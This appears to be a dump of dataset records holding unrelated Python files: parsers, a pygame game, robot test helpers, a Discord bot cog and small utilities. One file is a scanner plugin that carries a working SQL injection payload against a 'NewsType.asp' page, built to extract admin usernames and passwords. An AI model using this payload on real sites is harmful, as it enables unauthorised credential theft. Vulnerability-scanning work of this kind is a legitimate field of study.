[elem]\n self._last = elem\n self._tail = 0\n\n def handle_starttag(self, tag, attrs, self_closing=False):\n enabled = self.enabled\n # Add tag element to tree if we have no filter or that the filter matches\n if enabled or self._search(tag, attrs):\n # Convert attrs to dictionary\n attrs = dict(attrs) if attrs else {}\n self._flush()\n\n # Create the new element\n elem = self._factory(tag, attrs)\n 
self._elem[-1].append(elem)\n self._last = elem\n\n # Only append the element to the list of elements if it's not a self closing element\n if self_closing or tag in self._voids:\n self._tail = 1\n else:\n self._elem.append(elem)\n self._tail = 0\n\n # Set this element as the root element when the filter search matches\n if not enabled:\n self._root = elem\n self.enabled = True\n\n def handle_startendtag(self, tag, attrs):\n self.handle_starttag(tag, attrs, self_closing=True)\n\n def handle_endtag(self, tag):\n # Only process end tags when we have no filter or that the filter has been matched\n if self.enabled and tag not in self._voids:\n _elem = self._elem\n _root = self._root\n # Check that the closing tag is what's actualy expected\n if _elem[-1].tag == tag:\n self._flush()\n self._tail = 1\n self._last = elem = _elem.pop()\n if elem is _root:\n raise EOFError\n\n # If the previous element is what we actually have then the expected element was not\n # properly closed so we must close that before closing what we have now\n elif len(_elem) >= 2 and _elem[-2].tag == tag:\n self._flush()\n self._tail = 1\n for i in range(2):\n self._last = elem = _elem.pop()\n if elem is _root:\n raise EOFError\n else:\n # Unable to match the tag to an element, ignoring it\n return None\n\n def handle_data(self, data):\n data = data.strip()\n if data and self.enabled:\n self._data.append(data)\n\n def handle_comment(self, data):\n data = data.strip()\n if data and self.enabled:\n elem = Etree.Comment(data)\n self._elem[-1].append(elem)\n\n def close(self):\n self._flush()\n if self._root is not None:\n return self._root\n else:\n # Search the root element to find a proper html root element if one exists\n tmp_root = self._elem[0]\n proper_root = tmp_root.find(\"html\")\n if proper_root is None:\n # Not proper root was found\n return tmp_root\n else:\n # Proper root found\n return proper_root\n\n def error(self, message):\n raise HTMLParseError(message, self.getpos())\n\n def 
_flush(self):\n if self._data:\n if self._last is not None:\n text = \"\".join(self._data)\n if self._tail:\n self._last.tail = text\n else:\n self._last.text = text\n self._data = []\n\n def _search(self, tag, attrs):\n # Only search when the tag matches\n if tag == self.tag:\n # If we have required attrs to match then search all attrs for wanted attrs\n # And also check that we do not have any attrs that are unwanted\n if self.attrs or self._unw_attrs:\n if attrs:\n wanted_attrs = self.attrs.copy()\n unwanted_attrs = self._unw_attrs\n for key, value in attrs:\n # Check for unwanted attrs\n if key in unwanted_attrs:\n return False\n\n # Check for wanted attrs\n elif key in wanted_attrs:\n c_value = wanted_attrs[key]\n if c_value == value or c_value is True:\n # Remove this attribute from the wanted dict of attributes\n # to indicate that this attribute has been found\n del wanted_attrs[key]\n\n # If wanted_attrs is now empty then all attributes must have been found\n if not wanted_attrs:\n return True\n else:\n # We only need to match tag\n return True\n\n # Unable to find required section\n return False\n","sub_path":"htmlement.py","file_name":"htmlement.py","file_ext":"py","file_size_in_byte":13383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"235522781","text":"\nimport pygame as pg \nimport sys\nfrom bullet import Bullet\n\n\n# Function that handles the ship's navegation system\ndef navegation(ship, screen, bullets) :\n\t\n\n\tfor event in pg.event.get() :\n\t\t# TO QUIT\n\t\tif event.type == pg.QUIT :\n\t\t\tsys.exit()\n\t\t# TO MOVE RIGHT\n\t\tif event.type == pg.KEYDOWN :\n\t\t\tif event.key == pg.K_RIGHT: \n\t\t\t\tship.moving_right =True\n\t\t\tif event.key == pg.K_SPACE :\n\t\t\t\t#Creating a bullet and adding it to the bullet group created at Game file\n\t\t\t\tif len(bullets) < ship.bullet_allowed :\n\t\t\t\t\tnew_bullet = Bullet(screen, 
ship)\n\t\t\t\t\tbullets.add(new_bullet)\n\t\t\t\t\n\n\t\t# TO STOP MOVING RIGHT\t\t\n\t\tif event.type == pg.KEYUP :\n\t\t\tif event.key == pg.K_RIGHT: \n\t\t\t\tship.moving_right =False\n\n\t\t# TO MOVE LEFT\n\t\tif event.type == pg.KEYDOWN :\n\t\t\tif event.key == pg.K_LEFT: \n\t\t\t\tship.moving_left =True\n\t\t# TO STOP MOVING RIGHT\t\t\n\t\tif event.type == pg.KEYUP :\n\t\t\tif event.key == pg.K_LEFT: \n\t\t\t\tship.moving_left =False\t\n\t\t# TO FIRE THE BULLETS\n\n\n\n# Function that redraw the screen \ndef update_screen(ship, screen, bullets) :\n\n\tfor bullet in bullets.sprites() :\n\t\tbullet.draw_bullet()\n\n\n\ndef text_object(text, font) :\n\tred = (255,0,0)\n\tblack =(0,0,0)\n\twhite =(255,255,255)\n\tcolor ={\"red\" :red, \"black\" : black, \"white\": white }\n\ttextSurface = font.render(text, True, color[\"red\"])\n\treturn textSurface, textSurface.get_rect()\n\n\ndef message_display(text, screen) :\n\twidth, height = 500, 500 \n\tlargeText = pg.font.Font(\"freesansbold.ttf\", 50)\n\tTextSurf, TextRect = text_object(text, largeText)\n\tTextRect.center = ((width/2), (height/2))\n\tscreen.blit(TextSurf, TextRect)\n\t\n\n","sub_path":"input_processing.py","file_name":"input_processing.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"534805100","text":"\"\"\"\nFunctional test init\n\"\"\"\n\n__author__ = \"ybrun\"\n__copyright__ = \"Copyright August 2013, Aldebaran Robotics\"\n\nimport pytest\nimport time\nimport ssh_tools\nimport posixpath\nfrom os import path\nfrom random import choice\nfrom string import ascii_letters, digits, punctuation\nfrom sleekxmpp import ClientXMPP\nfrom distutils.version import LooseVersion\ntry:\n from qualifcloudsdk import cloud\nexcept ImportError:\n print (\"Module qualifcloudsdk not found. This module is required for Cloud tests. 
\"\n \"/n /n You can install it via : \"\n \"/n git clone git@git.aldebaran.lan:qualification-tools/qualification-libraries.git\"\n \"/n cd QualifCloudSdk/\"\n \"/n sudo python setup.py install\"\n \"/n sudo pip install qualifcloudsdk\")\n\ndef find_wired(services):\n \"\"\"Returns the service dict of the ethernet connection\"\"\"\n for elem in services:\n d = dict(elem)\n if d[\"Name\"] == \"Wired\":\n return d\n assert False\n\ndef find_wifi(services):\n \"\"\"Returns the service dict of the wifi connection (wifi must be called Now)\"\"\"\n for elem in services:\n d = dict(elem)\n if d[\"Name\"] == \"Now\":\n return d\n assert False\n\ndef randstring(length):\n \"\"\"\n Returns a random string of len length made of uppercase and lowercase letters,\n digits, and usual punctuation\n \"\"\"\n return ''.join(choice(ascii_letters + digits + punctuation) for _ in range(length))\n\ndef install_packages(package_manager, paths):\n \"\"\"\n Installs packages, returns the list of effectively installed packages\n You MUST pass it absolute paths\n \"\"\"\n installed = []\n ssh_tools.send_file(paths)\n names = map(path.basename, paths)\n for name in names:\n try:\n if package_manager.install(posixpath.join(\"/home/nao\", name), \"tester\"):\n installed.append(name)\n else:\n try:\n package_manager.getPackage(name.split(\".\")[0])\n installed.append(name)\n except:\n pass\n except:\n pass\n return installed\n\n\ndef install_package_relative(package_manager, paths):\n \"\"\"\n Installs package and returns the list of effectively installed packages\n\n input: PackageManager proxy, relative path to the file\n \"\"\"\n ssh_tools.send_file(paths)\n pkg = path.basename(paths)\n package_manager.install(\"/home/nao/\" + pkg)\n\n\ndef remove_package(package_manager, name):\n basename = name.split(\".\")[0]\n package_manager.remove(basename)\n ssh_tools.delete(name)\n\nclass EchoBot(ClientXMPP):\n\n def __init__(self, jid, password, reply=False):\n super(EchoBot, self).__init__(jid, 
password)\n self.add_event_handler('session_start', self.start)\n self.add_event_handler('message', self.message)\n\n def start(self, event):\n self.send_presence()\n self.get_roster()\n\n def message(self, msg):\n if reply:\n rpc = msg['body']\n cmd = rpc.replace(jid, msg['from'])\n msg.reply(cmd).send()\n else:\n operator.notif(msg['body'])\n\ndef set_cloud_image(type_version, vnum1=1, vnum2=22, vnum3=3, vnum4=49, domain=\"cloud-test.aldebaran-robotics.com\"):\n \"\"\" Set the version of the image to download (on the cloud)\n \"\"\"\n sdk = cloud.Cloud(domain)\n sdk.set_credentials(oauth=True)\n response = sdk.post_ade_api_profiles(data={\"name\": \"qualif-sw-tests\",\n \"owner\": \"\",\n \"admins\": \"\"})\n decoded_data = json.loads(response.text)\n pid = decoded_data['id']\n sdk.delete_ade_api_profiles_system(pid)\n sdk.post_ade_api_profiles_system(pid, data={\"filter_type\": type_version,\n \"filter_vnum1\": vnum1,\n \"filter_vnum2\": vnum2,\n \"filter_vnum3\": vnum3,\n \"filter_vnum4\": vnum4})\n sdk.delete_ade_api_profiles(pid)\n\nclass SystemDownloadChecker(object):\n\n \"\"\" Module to catch SystemImageDownloaded event\n \"\"\"\n\n def __init__(self):\n \"\"\" __init__\n \"\"\"\n self.downloaded = False\n\n def getDownloaded(self):\n \"\"\" Getter\n \"\"\"\n return self.downloaded\n\n def test(self, value):\n \"\"\"Callback when SystemImageDownloaded is raised.\n \"\"\"\n self.downloaded = True\n\ndef raiseEventAfterDelay(memory, event, value, delay):\n \"\"\" Created to be used in threads - which allows to raise an event in the\n background after a defined delay (you can do other stuff in the meantime)\n \"\"\"\n time.sleep(delay)\n memory.raiseEvent(event, value)\n\ndef systemNotifIdsWith0arg():\n \"\"\" Return the list of system notification ids which does not need any argument to construct their message\n \"\"\"\n return [12, 110, 111, 120, 200, 201, 202, 203, 204, 205, 214, 215, 400, 401, 402, 404, 405, 500, 501, 600, 712, 725, 726, 730, 731, 800, 
801, 802, 803, 805, 806, 810, 900, 901, 902, 903, 920, 921, 922, 923]\n\ndef systemNotifIdsWith1argVersion():\n \"\"\" Return the list of system notification ids which needs one argument (a version number) to construct their message\n \"\"\"\n return [10, 11, 100, 101, 102, 103, 104, 105, 840]\n\ndef systemNotifIdsWith1argDevices():\n \"\"\" Return the list of system notification ids which needs one argument (a list of devices) to construct their message\n \"\"\"\n return [720, 721, 722, 723, 724]\n\ndef systemNotifIdsWith1argApps():\n \"\"\" Return the list of system notification ids which needs one argument (a list of app names) to construct their message\n \"\"\"\n return [830, 832, 834]\n\ndef systemNotifIdsWith2args():\n \"\"\" Return the list of system notification ids which needs two arguments (a number and a list of devices) to construct their message\n \"\"\"\n return [710, 711, 713, 714]\n\ndef systemAllNotifIds():\n \"\"\" Return the list of all existing system notification ids\n \"\"\"\n return systemNotifIdsWith0arg() + systemNotifIdsWith1argVersion() + systemNotifIdsWith1argDevices() + systemNotifIdsWith1argApps() + systemNotifIdsWith2args()\n\ndef argsForSystemId(systemId):\n \"\"\" Return an example of valid arguments corresponding to a system notification id and needed to construct its message\n \"\"\"\n # if 1 arg expected (version number)\n if systemId in systemNotifIdsWith1argVersion():\n return [\"1.2.3\"]\n # if 1 arg expected (list of devices)\n if systemId in systemNotifIdsWith1argDevices():\n return [\"right leg, left arm\"]\n # if 1 arg expected (list of apps)\n if systemId in systemNotifIdsWith1argApps():\n return [\"Cocoro, Awesome dance\"]\n # if 2 args expected (number of devices, list of devices)\n if systemId in systemNotifIdsWith2args():\n return [\"2\", \"right arm, left leg\"]\n # if 0 arg expected\n return []\n\ndef check_alvalue_internal_notification(value):\n \"\"\"\n Description : Checks that value is well formatted.\n \"id\": 
int higher or equal to -1\n \"severity\": \"error\" or \"warning\" or \"info\"\n \"removeOnRead\": true or false\n \"msgParts\": array of strings\n \"msgArgs\": array of strings\n \"immediate\": true or false\n \"sysId\": int higher or equal to 0\n For example:\n [[\"id\", 2],\n [\"severity\", \"info\"],\n [\"removeOnRead\", true],\n [\"msgParts\", [\"#I could not update my applications.\", \"#They are too %s.\"]],\n [\"msgArgs\", [\"#lame\"]],\n [\"immediate\", false],\n [\"sysId\", 42]]\n \"\"\"\n assert(isinstance(value[\"id\"], long))\n assert(value[\"id\"] >= -1)\n assert(isinstance(value[\"severity\"], str))\n assert(value[\"severity\"] in [\"info\", \"warning\", \"error\"])\n assert(isinstance(value[\"removeOnRead\"], bool))\n assert(isinstance(value[\"msgParts\"], list))\n for msgPart in value[\"msgParts\"]:\n assert(isinstance(msgPart, str))\n assert(isinstance(value[\"msgArgs\"], list))\n for msgArg in value[\"msgArgs\"]:\n assert(isinstance(msgArg, str))\n assert(isinstance(value[\"immediate\"], bool))\n assert(isinstance(value[\"sysId\"], long))\n assert(value[\"sysId\"] >= 0)\n\n\ndef clear_notifications(notification_manager):\n \"\"\"\n Remove all notifications in ALNotificationManager queue\n \"\"\"\n notif_ids = [dict(n)['id'] for n in notification_manager.notifications()]\n for notif_id in notif_ids:\n notification_manager.remove(notif_id)\n\n\ndef compare_systemVersion(version1, version2):\n \"\"\"\n inputs:\n version1: string\n version2: string\n Return:\n true if version1 >= version2\n false if version1 < version2\n Exemple:\n for version1 = '2.5.1.15' and version2 = '2.5.0.20' --> True\n for version1 = '2.5.1.15' and version2 = '2.5.1.120' --> False\n for version1 = '2.5.1.15' and version2 = '2.5.1.15' --> True\n for version1 = '2.5.1.15' and version2 = '2.5.1' --> True\n for version1 = '2.6.1' and version2 = '2.5.0' --> True\n \"\"\"\n return LooseVersion(version1) >= LooseVersion(version2)\n\ndef get_naoqi_version_from_robot():\n \"get NAOqi 
version from robot\"\n output = ssh_tools.runcommand(\"cat /etc/lsb-release | grep DISTRIB_RELEASE | cut -d'=' -f2\")\n try:\n version_number = \"{}.{}\".format(output.split('.')[0],output.split('.')[1])\n except:\n version_number = \"\"\n return version_number\n","sub_path":"autonomous_abilities/core_tools.py","file_name":"core_tools.py","file_ext":"py","file_size_in_byte":9434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"403979670","text":"from_path = './200604-200611_첨성대벽돌균열/2_정상-비정상-머신러닝적용.ipynb'\nto_path = './200604-200611_첨성대벽돌균열/3_정상-비정상-머신러닝적용.ipynb'\n\n# --------------------------------\n\nimport os\n\n# If directory\nif os.path.isdir(from_path):\n if not os.path.exists(to_path): os.mkdir(to_path)\n\n for file_path in os.listdir(from_path):\n from_file_path = os.path.join(from_path, file_path)\n to_file_path = os.path.join(to_path, file_path)\n\n os.system(f'git mv \"{from_file_path}\" \"{to_file_path}\"')\n\n os.remove(from_path)\n\n# If file\nelse:\n os.system(f'git mv \"{from_path}\" \"{to_path}\"')\n\n# --------------------------------\n\nprint(\"commit title:\", end='\\n')\nprint(f' Rename \"{os.path.basename(from_path)}\" -> \"{os.path.basename(to_path)}\"', end='\\n\\n')\nprint(\"commit description:\", end='\\n')\nprint(f' \"{from_path}\" -> \"{to_path}\"', end='\\n\\n')","sub_path":"util_git-mv.py","file_name":"util_git-mv.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"625844820","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: Lcy\n# @Date: 2016-09-20 15:34:41\n# @Last Modified by: Lcy\n# @Last Modified time: 2016-09-27 16:42:25\nimport requests\nimport re\nclass Exploit:\n def __init__(self,target,expfile):\n self.target = target\n self.result = {\n \"name\": \"南方数据NewsType.asp SQL注入漏洞\",\n \"author\": \"Lcy\",\n \"type\": \"website\",\n \"ref\": \"baidu\",\n 
\"status\":False,\n \"info\":\"\",\n 'filename':expfile,\n \"target\":target,\n }\n def verify(self):\n file_path = (\"/NewsType.asp?SmallClass=%27%20union%20select%200,chr(126)%2Busername%2BCHR(58)%2Bpassword%2Bchr(126),2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20%27%27=%27\")\n verify_url = self.target + file_path\n r = requests.get(verify_url,timeout=5)\n if 'javastr=javastr' in r.text:\n match_result = re.findall(r'>~(.*?)~',r.text)\n if match_result:\n self.result['status'] = True\n self.result['info'] = \"目标存在南方数据NewsType.asp SQL注入漏洞, 验证url: %s\" % verify_url\n ","sub_path":"tools/scanner/lcyscan/exploits/website/liangjin_sqlinject.py","file_name":"liangjin_sqlinject.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"268340356","text":"# coding=utf-8\n\"\"\"Web-based tests for functionality of API Key routing.\"\"\"\nfrom apiphany.api.apis.common.api import Api\nfrom ..common.apiphanytestcase import ApiphanyTestCase\n\n\nclass ModelTests(ApiphanyTestCase):\n def testView(self):\n self.get_application().apis = {\n \"ff\": {\n \"v1\": FakeApi()\n }\n }\n test_client = self.make_test_client()\n rv = test_client.get('/ff/v1/?url=unimportant')\n\n self.assertEqual(rv.status_code, 200)\n self.assertEqual(rv.mimetype, \"application/json\")\n\n\nclass DerivingFakeApi(Api):\n \"\"\"Simple implementation of Api to test superclass functionality.\"\"\"\n\n\nclass FakeApi(object):\n \"\"\"Simple API which returns a FakeResult.\"\"\"\n # noinspection PyUnusedLocal\n @staticmethod\n def get(parameters):\n \"\"\"Always return a FakeResult.\"\"\"\n return FakeResult()\n\n\nclass FakeResult(object):\n \"\"\"Simple result object to test API logic.\"\"\"\n @property\n def is_valid(self):\n \"\"\"Always return True.\"\"\"\n return True\n\n @property\n def json(self):\n \"\"\"Always return an empty JSON object.\"\"\"\n return 
\"{}\"\n","sub_path":"test/web/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"502472905","text":"\nimport random\nimport string\nfrom Tkinter import *\n\ndef test():\n\n\n root = Tk()\n\n def addCheckBox():\n checkBoxName = \"\".join(random.choice(string.letters) for _ in range(10))\n #c = Checkbutton(root, text=checkBoxName)\n\n safety = StringVar(value='none')\n c = Checkbutton(root, text=checkBoxName,variable=safety)\n c.pack()\n\n b = Button(root, text=\"Add a checkbox\", command=addCheckBox)\n b.pack()\n\n root.mainloop()\n\n\n\n","sub_path":"HyperCal/TestTk2.py","file_name":"TestTk2.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"500682076","text":"\"\"\"\nQuestions: https://leetcode.com/problems/two-sum/\n\nGiven an array of integers nums and an integer target,\nreturn indices of the two numbers such that they add up to target\nYou may assume that each input would have exactly one solution,\nand you may not use the same element twice.\n\nYou can return the answer in any order.\nExample 1:\n\nInput: nums = [2,7,11,15], target = 9\nOutput: [0,1]\nOutput: Because nums[0] + nums[1] == 9, we return [0, 1].\nExample 2:\n\nInput: nums = [3,2,4], target = 6\nOutput: [1,2]\nExample 3:\n\nInput: nums = [3,3], target = 6\nOutput: [0,1]\n\nConstraints:\n\n2 <= nums.length <= 10^5\n-10^9 <= nums[i] <= 10^9\n-10^9 <= target <= 10^9\n\"\"\"\nfrom typing import List\n\n\ndef two_sum(nums: List[int], target: int) -> List[int]:\n \"\"\"\n Implies that every input will have an answer from the wording of the question\n Constraint that the values in the list are unique as only one solution could exist\n the pair needed to make the target must be there only once.\n\n For this purpose it'd be better to collect the number and the integer that\n would 
produce the target into a hash table\n \"\"\"\n compliments = dict()\n for idx, cur_val in enumerate(nums):\n need_val = target - cur_val\n\n if need_val in compliments:\n return [compliments[need_val], idx]\n compliments[cur_val] = idx\n return []\n","sub_path":"python/coding_challenges/leet_code/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"77891679","text":"from setuptools import setup, find_packages\n\n\ndef read_requirements(filename):\n with open(filename) as f:\n return [req for req in (req.partition('#')[0].strip() for req in f) if req]\n\n\nsetup(\n name='spinta',\n description='Data store.',\n author='Mantas Zimnickas',\n author_email='sirexas@gmail.com',\n version='0.0.1',\n license='MIT',\n packages=find_packages(),\n package_data={'spinta': ['manifest/*.yml', 'templates/*.html']},\n install_requires=read_requirements('requirements.in'),\n entry_points={\n 'console_scripts': [\n 'spinta = spinta.cli:main',\n ]\n },\n)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"183075256","text":"#!/usr/bin/env python\nimport socket\n\nHOST = 'localhost'\nPORT = 9900\n\n\ndef client():\n '''\n clent.py will send the 'client.png' to server folder\n '''\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.connect((HOST, PORT))\n\n print('Client connected to the server')\n\n file = open('client.png', \"rb\")\n \n client_socket.sendall(file.read())\n file.close() \n client_socket.close()\n\n\nif __name__ == '__main__':\n client()\n","sub_path":"week02/Assignment1/Client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"323039965","text":"#!/usr/bin/python3\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QCursor\nfrom PyQt5.QtWidgets import (QApplication,QPushButton, QVBoxLayout, QWidget)\nimport sys,random,time\n\nclass main_window(QWidget):\n\tdef set_rand_pos(self):\n\t\tcursor = QCursor()\n\t\tfor x in range(10):\n\t\t\tcursor.setPos(random.randint(0,500),random.randint(0,500))\n\t\t\ttime.sleep(1)\t\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.setWindowTitle(\"Randomator myszy\")\n\t\tself.but = QPushButton(\"Randomizuj\")\n\t\tself.but.clicked.connect(self.set_rand_pos)\n\t\tself.vlayout = QVBoxLayout()\n\t\tself.vlayout.addWidget(self.but)\n\t\tself.setLayout(self.vlayout)\n\nif __name__ == \"__main__\":\n\taplication = QApplication(sys.argv)\n\twindow = main_window()\n\twindow.show()\n\tsys.exit(aplication.exec())\n\n","sub_path":"Pythony/PyQt5_randomator_myszy.py","file_name":"PyQt5_randomator_myszy.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"81032144","text":"##\n# @file EvalMetrics.py\n# @author Yibo Lin\n# @date Sep 2018\n# @brief Evaluation metrics \n#\n\nimport time\nimport pdb \n\nclass EvalMetrics (object):\n \"\"\"\n @brief evaluation metrics at one step \n \"\"\"\n def __init__(self, iteration=None):\n \"\"\"\n @brief initialization\n @param iteration optimization step \n \"\"\"\n self.iteration = iteration \n self.wirelength = None\n self.density = None \n self.density_weight = None\n self.hpwl = None \n self.rmst_wl = None\n self.overflow = None\n self.max_density = None\n self.gamma = None\n self.eval_time = None\n\n def __str__(self):\n \"\"\"\n @brief convert to string \n \"\"\"\n content = \"\"\n if self.iteration is not None:\n content = \"iteration %4d\" % (self.iteration)\n if self.wirelength is not None:\n content += \", wirelength %.3E\" % (self.wirelength)\n if self.density is not None: \n content += \", density 
%.3E\" % (self.density)\n if self.density_weight is not None: \n content += \", density_weight %.6E\" % (self.density_weight)\n if self.hpwl is not None:\n content += \", HPWL %.6E\" % (self.hpwl)\n if self.rmst_wl is not None:\n content += \", RMSTWL %.3E\" % (self.rmst_wl)\n if self.overflow is not None:\n content += \", overflow %.6E\" % (self.overflow)\n if self.max_density is not None:\n content += \", max density %.3E\" % (self.max_density)\n if self.gamma is not None: \n content += \", gamma %.6E\" % (self.gamma)\n if self.eval_time is not None: \n content += \", time %.3fms\" % (self.eval_time*1000)\n\n return content \n\n def __repr__(self):\n \"\"\"\n @brief print \n \"\"\"\n return self.__str__()\n\n def evaluate(self, placedb, ops, var):\n \"\"\"\n @brief evaluate metrics \n @param placedb placement database \n @param ops a list of ops \n @param var variables \n \"\"\"\n tt = time.time()\n if \"wirelength\" in ops:\n self.wirelength = ops[\"wirelength\"](var).data\n if \"density\" in ops:\n self.density = ops[\"density\"](var).data\n if \"hpwl\" in ops:\n self.hpwl = ops[\"hpwl\"](var).data\n if \"rmst_wls\" in ops:\n rmst_wls = ops[\"rmst_wls\"](var)\n self.rmst_wl = rmst_wls.sum().data\n if \"overflow\" in ops:\n overflow, max_density = ops[\"overflow\"](var)\n self.overflow = overflow.data / placedb.total_movable_node_area\n self.max_density = max_density.data \n self.eval_time = time.time()-tt\n","sub_path":"dreamplace/EvalMetrics.py","file_name":"EvalMetrics.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157003318","text":"import asyncio\nimport re\nimport discord\nimport random\n\nfrom typing import Any\nfrom discord.utils import get\n\nfrom redbot.core import Config, checks, bank, modlog, commands\nfrom redbot.core.utils.chat_formatting import pagify, box, warning, error\nfrom redbot.cogs.bank import check_global_setting_guildowner, 
check_global_setting_admin\n\nfrom redbot.core.bot import Red\n\nCog: Any = getattr(commands, \"Cog\", object)\n\n\nclass Gamers(Cog):\n \"\"\"\n Various custom made commands for NG server.\n \"\"\"\n\n __author__ = \"saurichable\"\n __version__ = \"1.0.0\"\n\n def __init__(self, bot: Red):\n self.bot = bot\n\n # FOR MEMBERS:\n @commands.command()\n @commands.guild_only()\n async def support(self, ctx: commands.Context, *, message=\"\"):\n \"\"\"Opens a support ticket.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_add = get(ctx.guild.roles, id=482562270077911070) # PENDING SUPPORT\n role_men = get(ctx.guild.roles, id=482562007443439646) # Mods\n\n await ctx.author.add_roles(role_add)\n await role_men.edit(mentionable=True)\n if not message:\n await ctx.send(\n f\"**Thank you for reaching out to us, {ctx.author.mention}!**\\n\\n{role_men.mention} have been notified that you need \"\n \"assistance.\\n\\n**Problem:** Not specified.\\n*Please state your problem/issue now so we can get to you as soon as possible.\"\n \" If it is personal, state it as well.*\"\n )\n else:\n await ctx.send(\n f\"**Thank you for reaching out to us, {ctx.author.mention}!**\\n\\n{role_men.mention} have been notified that you need assistance.\\n\\n\"\n f\"**Problem:** {message}\"\n )\n await role_men.edit(mentionable=False)\n\n @commands.command()\n @commands.guild_only()\n async def mod(self, ctx: commands.Context, *, message=\"\"):\n \"\"\"Calls Mods.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_men = get(ctx.guild.roles, id=482562007443439646) # Mods\n\n await role_men.edit(mentionable=True)\n if not message:\n await ctx.send(f\"{role_men.mention}\")\n else:\n await ctx.send(\n f\"{role_men.mention}\\n{ctx.author.mention}: {message}\"\n )\n await role_men.edit(mentionable=False)\n\n # PING ROLES:\n @commands.command()\n @commands.guild_only()\n async def event(self, ctx: commands.Context, *, message=\"\"):\n \"\"\"For Event hosts only.\"\"\"\n if 
ctx.guild.id != 482560976307355658:\n return\n\n role_men = get(ctx.guild.roles, id=485582775970168832) # Event ping\n\n await ctx.message.delete()\n await role_men.edit(mentionable=True)\n await ctx.send(f\"{role_men.mention}\\n{message}\")\n await role_men.edit(mentionable=False)\n\n @checks.admin_or_permissions(administrator=True)\n @commands.command()\n @commands.guild_only()\n async def poll(self, ctx: commands.Context, *, message=\"\"):\n \"\"\"For Poll hosts only.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_men = get(ctx.guild.roles, id=485756032614793216) # Poll ping\n\n await ctx.message.delete()\n await role_men.edit(mentionable=True)\n await ctx.send(f\"{role_men.mention}\\n{message}\")\n await role_men.edit(mentionable=False)\n\n # FOR MODS:\n @checks.mod_or_permissions(ban_members=True)\n @commands.command()\n @commands.guild_only()\n async def close(self, ctx: commands.Context, target: discord.Member):\n \"\"\"Closes an open ticket.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_rem1 = get(ctx.guild.roles, id=482562270077911070) # PENDING SUPPORT\n role_rem2 = get(ctx.guild.roles, id=519847615882330113) # Personal\n\n await target.remove_roles(role_rem1)\n await target.remove_roles(role_rem2)\n await ctx.send(f\"Successfully closed {target.display_name}'s ticket.\")\n\n @checks.mod_or_permissions(ban_members=True)\n @commands.command()\n @commands.guild_only()\n async def personal(self, ctx: commands.Context, target: discord.Member):\n \"\"\"In case someone has a personal issue.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_add = get(ctx.guild.roles, id=519847615882330113) # Personal\n channel_men = get(ctx.guild.channels, id=519848071832535040) # personal-support\n\n await target.add_roles(role_add)\n await ctx.send(\n f\"{target.mention}, move to {channel_men.mention} please.\"\n )\n\n # FOR ME ONLY:\n @checks.is_owner()\n @commands.command()\n @commands.guild_only()\n async def end(self, 
ctx: commands.Context):\n \"\"\" End the Monthly Competition \"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n five = get(ctx.guild.roles, id=483715523482222613) # 5+\n channel = get(ctx.guild.text_channels, id=483365869565509635) # naughty-bank\n await channel.set_permissions(five, read_messages=True, send_messages=False)\n await ctx.tick()\n await channel.send(\n \"---------------------------------MONTHLY COMPETITION HAS ENDED---------------------------------\"\n )\n\n @checks.is_owner()\n @commands.command()\n @commands.guild_only()\n async def start(self, ctx: commands.Context):\n \"\"\" Start the Monthly Competition \"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n five = get(ctx.guild.roles, id=483715523482222613) # 5+\n channel = get(ctx.guild.text_channels, id=483365869565509635) # naughty-bank\n await channel.set_permissions(five, read_messages=True, send_messages=True)\n await bank.wipe_bank(guild=ctx.guild)\n await ctx.tick()\n await channel.send(\n \"---------------------------------MONTHLY COMPETITION HAS STARTED---------------------------------\"\n )\n\n # NAUGHTY GAMERS SERVER ONLY:\n @commands.command()\n @commands.guild_only()\n async def request(self, ctx: commands.Context):\n \"\"\"Opens a verification ticket.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_add = get(\n ctx.guild.roles, id=482655573964488706\n ) #'PENDING VERIFICATION' role\n av = get(ctx.guild.roles, id=482562076364242944) # Verified\n age1 = get(ctx.guild.roles, id=585837902798520333) # <15\n age2 = get(ctx.guild.roles, id=514129601883275267) # 16-17\n age3 = get(ctx.guild.roles, id=482582198248275995) # 18-21\n age4 = 